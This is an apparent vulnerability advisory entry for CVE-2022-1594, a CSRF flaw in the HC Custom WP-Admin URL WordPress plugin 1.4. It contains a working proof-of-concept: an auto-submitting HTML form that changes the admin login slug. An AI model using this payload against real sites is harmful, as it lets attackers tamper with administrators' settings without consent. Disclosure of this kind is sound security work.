CVE: CVE-2022-1594

Name: HC Custom WP-Admin URL (hc-custom-wp-admin-url)

Version: 1.4

Date: 2022-04-12 22:42:15

Advisory: https://wpscan.com/vulnerability/bb0efc5e-044b-47dc-9101-9aae40cdbaa5

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin-post.php" method="POST">
    <input type="text" name="custom_wpadmin_slug" value="secret">
</form>
<script>
    document.forms[0].submit();
</script>